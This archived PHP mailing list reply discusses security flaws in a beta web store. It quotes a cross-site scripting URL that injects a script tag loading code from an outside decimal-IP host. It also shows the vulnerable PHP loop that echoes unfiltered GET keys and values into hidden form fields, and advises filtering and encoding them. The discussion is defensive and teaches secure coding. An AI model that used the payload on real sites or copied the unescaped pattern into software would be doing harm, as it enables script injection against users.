Re: Re: Free penetration test

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Chris W. Parker wrote:
> Rasmus Lerdorf <mailto:rasmus@xxxxxxxxxxx>
>     on Friday, May 27, 2005 11:58 AM said:
> 
> 
>>>>You have all sorts of problems at that URL.  To start with, here is
>>>>a cross-site scripting hack: 
>>>>
>>>>
> 
> http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript
> %09
> 
>>>>src%3D%22http://3423329163/v
> 
> 
> First of all, excellent example.
> 
> 
>>Don't display arbitrary key names in hidden fields the way you are.
> 
> 
> What do you mean by "arbitrary key names"?

He was apparently doing something along the lines of:

  foreach($_GET as $key=>$val) {
    echo <<<EOL
<input type="hidden" name="$key" value="$val">
EOL;
  }

Probably just a lazyness thing.  Generally you will want to keep track
of which query args are actually valid and not just parrot whatever you
get back to the user.  Or if you are going to do do it this way,
recognize that you have to filter/encode both the query arg names and
the values.

-Rasmus

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux